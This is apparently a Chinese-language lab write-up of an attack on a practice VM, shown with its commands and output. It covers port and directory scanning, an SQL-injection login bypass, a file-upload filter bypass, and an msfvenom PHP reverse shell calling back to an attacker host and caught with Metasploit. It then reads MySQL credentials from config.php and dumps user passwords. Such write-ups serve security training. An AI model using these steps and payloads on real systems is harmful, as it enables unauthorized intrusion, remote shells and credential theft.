渗透靶机进行提权
1 获取靶机相关信息
nmap -sV 192.168.222.131 *** Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT Nmap scan report for localhost (192.168.222.131) Host is up (0.000067s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) MAC Address: 00:0C:29:97:47:75 (VMware) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.92 seconds ***
nmap -A -v -T4 192.168.222.131 *** Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:11 EDT NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Initiating ARP Ping Scan at 03:11 Scanning 192.168.222.131 [1 port] Completed ARP Ping Scan at 03:11, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 03:11 Completed Parallel DNS resolution of 1 host. at 03:11, 0.00s elapsed Initiating SYN Stealth Scan at 03:11 Scanning localhost (192.168.222.131) [1000 ports] Discovered open port 80/tcp on 192.168.222.131 Discovered open port 21/tcp on 192.168.222.131 Discovered open port 22/tcp on 192.168.222.131 Completed SYN Stealth Scan at 03:11, 0.12s elapsed (1000 total ports) Initiating Service scan at 03:11 Scanning 3 services on localhost (192.168.222.131) Completed Service scan at 03:11, 6.01s elapsed (3 services on 1 host) Initiating OS detection (try #1) against localhost (192.168.222.131) NSE: Script scanning 192.168.222.131. Initiating NSE at 03:11 NSE: [ftp-bounce] PORT response: 500 Illegal PORT command. Completed NSE at 03:11, 3.51s elapsed Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Nmap scan report for localhost (192.168.222.131) Host is up (0.00014s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.222.128 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 600 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 3 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA) | 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA) | 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA) |_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: BTRisk MAC Address: 00:0C:29:97:47:75 (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 0.249 days (since Tue Oct 19 21:13:36 2021) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.14 ms localhost (192.168.222.131) NSE: Script Post-scanning. Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Initiating NSE at 03:11 Completed NSE at 03:11, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.41 seconds Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.290KB) ***
2.发现存在80端口,扫描其网页目录
dirb http://192.168.222.131 *** ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Oct 20 03:21:34 2021 URL_BASE: http://192.168.222.131/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.222.131/ ---- ==> DIRECTORY: http://192.168.222.131/assets/ + http://192.168.222.131/index.php (CODE:200|SIZE:758) ==> DIRECTORY: http://192.168.222.131/javascript/ + http://192.168.222.131/server-status (CODE:403|SIZE:295) ==> DIRECTORY: http://192.168.222.131/uploads/ ---- Entering directory: http://192.168.222.131/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.222.131/javascript/ ---- ==> DIRECTORY: http://192.168.222.131/javascript/jquery/ ---- Entering directory: http://192.168.222.131/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://192.168.222.131/javascript/jquery/ ---- + http://192.168.222.131/javascript/jquery/jquery (CODE:200|SIZE:252879) + http://192.168.222.131/javascript/jquery/version (CODE:200|SIZE:5) ----------------- END_TIME: Wed Oct 20 03:21:42 2021 DOWNLOADED: 13836 - FOUND: 4 ***
nikto -host IP:PORT(如果是80端口,可以不加端口号) nikto -host 192.168.222.131 *** - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.222.131 + Target Hostname: 192.168.222.131 + Target Port: 80 + Start Time: 2021-10-20 03:25:17 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.7 (Ubuntu) + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /config.php: PHP Config file may contain database IDs and passwords. #php的配置文件,会有sql的账户以及密码文件 + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 7915 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2021-10-20 03:26:10 (GMT-4) (53 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ***
2、登陆目标靶机login页面
定义了用户的值,将值赋值到了user变量中,密码,赋值到了pwd变量。str是user用户和子字符串,从用户名最后一个出现@符号+1 开始,一直到user的结束。
可以发现pwd==" ’ "如果密码等于单引号会提示黑客入侵,可以联想到sql注入,使用fuzz模糊测试是否存在sql注入
绕过登录认证机制
web模糊测试字典位置 /usr/share/wordlists/wfuzz
burp爆破
爆破出来些sql注入的密码
访问burp的网页链接
http://burp/show/2/z04tysv5yakgkqk89wm5h4owdubpursu
3、发现这是个文件上传页面
检测不出来php页面
只能检测出来jpg,该网页对上传内容进行了限制
通过抓包进行修改上传PHP
利用msf创建一个可以回弹的shell msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128(攻击机) lport=4444(端口) -f raw > /root/shell.php(文件路径&文件名) 修改shell,将注释符删去
将shell.php重命名为shell.jpg #绕过登录验证 在利用burpsuite进行抓包更改绕过验证,以实现绕过 上传成功
通过倾听端口方式回弹shell
1、利用msf进行监听
msfconsole //打开msf工具 use exploit/multi/handler set payload php/meterpreter/reverse_tcp //设置payload set lhost 192.168.222.128 //回弹的IP地址 set lport 4444 //回弹的端口
网页点开payload页面
回弹成功
sysinfo //查看系统配置 查看config.php的配置文件 查看出mysql的信息.账户和密码
mysql -u root -p //登录mysql show databases; //查看sql信息,发现权限不够 python -c "import pty;pty.spawn('/bin/bash')" //python提供pty模块,一行脚本就可以创建一个原生的终端 利用原生的终端进行登录mysql,查看mysql的内容 mysql -u root -p 输入密码:toor show databases; //查看当前的数据库列表 use deneme; //使用deneme数据库 select * from user; //查看表中信息 查看到用户名以及密码 使用ssh登录